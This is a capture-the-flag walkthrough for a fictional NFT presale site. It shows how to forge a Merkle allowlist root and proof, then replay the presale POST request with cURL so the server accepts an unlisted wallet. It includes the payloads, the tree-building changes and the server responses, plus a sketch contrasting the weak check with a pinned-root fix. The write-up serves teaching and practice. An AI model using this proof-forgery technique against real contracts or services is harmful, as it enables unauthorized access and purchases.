Exploit a Smart Contract
Luigi is standing next to a terminal.
Challenge

Exploit flaws in a smart contract to buy yourself a Bored Sporc NFT. Find hints for this objective hidden throughout the tunnels.

Solution

The Bored Sporc Rowboat Society web site has three pages:

First, let's do a simple check using the presale page and the following information:

Looking at the web console, we see a POST request to https://boredsporcrowboatsociety.com/cgi-bin/presale with the following payload:

{
"WalletID":"0x(yourownaddress)",
"Root":"0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80",
"Proof":"0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b",
"Validate":"true",
"Session":"7819373f-f635-44b1-96b1-65ec01c9426f"
}

So it seems all we need is a valid Merkle tree, its root and a proof. Let's create one using this repo. The only code changes necessary are the following (for the other two leaves, just take an address from the gallery page):

allowlist = ["0xa1861E96DeF10987E1793c8f77E811032069f8E9", "0x(yourownaddress)", "0xc249927fb81bde4eA7B9Dc9e4c9E6F503F147fe2"]
print('Proof:', mt.get_proof(Web3.solidityKeccak(['bytes'], ["0x(yourownaddress)"])))

Run it using docker:

docker build -t merkletrees .
docker run -it --rm --name=merkletrees merkletrees

mt_user@566f02498986:~$ python3 merkle_tree.py
Root: 0x258e841a5cd9a65de7bba00172960e55e985fd29f4143cb5dc866bc29239ae80
Proof: ['0x083f32bd3c6bdf00d603dbd24cd0165fbfdd8afa09d082950baf6b425b1d0f5b']

We go back to the web site, open the developer tools and copy the original presale call as a cURL request (saved here as check.sh). We substitute the root and proof in the payload with the values from our Python script:

└─$ ./check.sh
{"Response": "You're on the list and good to go! Now... BUY A SPORC!"}
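
The request carries its own Root, and a self-generated root and proof were accepted, which is consistent with the server verifying the Proof against whatever Root the caller sends. The sketch below is an added example (not the challenge's server code or the repo's script) that contrasts such a check with one that pins the root server-side. Assumptions: SHA3-256 from hashlib stands in for keccak256, siblings are sorted before hashing, and all addresses and function names are constructed for illustration.

```python
import hashlib

def h(data: bytes) -> bytes:
    # Assumption: SHA3-256 stands in for Solidity's keccak256 (standard library only).
    return hashlib.sha3_256(data).digest()

def leaf(addr: str) -> bytes:
    return h(bytes.fromhex(addr[2:]))

def hash_pair(a: bytes, b: bytes) -> bytes:
    # Assumed convention: siblings are sorted before hashing, so proofs need no side flags.
    return h(a + b) if a <= b else h(b + a)

def root_and_proof(leaves, index):
    """Return (root, proof) for leaves[index]; an unpaired node is carried up unchanged."""
    proof, level = [], list(leaves)
    while len(level) > 1:
        if (index ^ 1) < len(level):
            proof.append(level[index ^ 1])
        level = [hash_pair(level[i], level[i + 1]) if i + 1 < len(level) else level[i]
                 for i in range(0, len(level), 2)]
        index //= 2
    return level[0], proof

def verify(proof, root, node):
    for sibling in proof:
        node = hash_pair(node, sibling)
    return node == root

# Constructed sample data, not real wallets.
ALLOWLIST = ["0x" + "11" * 20, "0x" + "22" * 20, "0x" + "33" * 20]
OUTSIDER = "0x" + "aa" * 20
PINNED_ROOT = root_and_proof([leaf(a) for a in ALLOWLIST], 0)[0]  # server-side state

def check_trusting_request(req):
    # Weak: the root is taken from the request, so the caller chooses the tree.
    return verify(req["Proof"], req["Root"], leaf(req["WalletID"]))

def check_pinned_root(req):
    # Hardened: only the server's own root counts; req["Root"] is ignored.
    return verify(req["Proof"], PINNED_ROOT, leaf(req["WalletID"]))

def build_request(addresses, index):
    # Builds a presale-style payload (bytes instead of hex strings) from any address list.
    root, proof = root_and_proof([leaf(a) for a in addresses], index)
    return {"WalletID": addresses[index], "Root": root, "Proof": proof}

if __name__ == "__main__":
    self_built = build_request([ALLOWLIST[0], OUTSIDER, ALLOWLIST[2]], 1)
    print(check_trusting_request(self_built), check_pinned_root(self_built))
```

With the root pinned, a proof built over a self-made tree no longer verifies, while proofs for real allowlist members still do.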

We note the society wallet address 0xe8fC6f6a76BE243122E3d01A1c544F87f1264d3a and use a KTM to transfer 100KC. We then run the same script with the parameter changed to "Validate":"false":

└─$ ./transfer.sh
{"Response": "Success! You are now the proud owner of BSRS Token #000179. You can find more information at https://boredsporcrowboatsociety.com/TOKENS/BSRS179, or check it out in the gallery!<br>Transaction: 0xb44139083a7bdd6181c464b1a31640d4bec2275d0ad9d00c8bf67ff371f5aa07, Block: 61904<br><br>Remember: Just like we planned, tell everyone you know to <u><em>BUY A BoredSporc</em></u>.<br>When general sales start, and the humans start buying them up, the prices will skyrocket, and we all sell at once!<br><br>The market will tank, but we'll all be rich!!!"}

Indeed we have a beautiful Sporc NFT.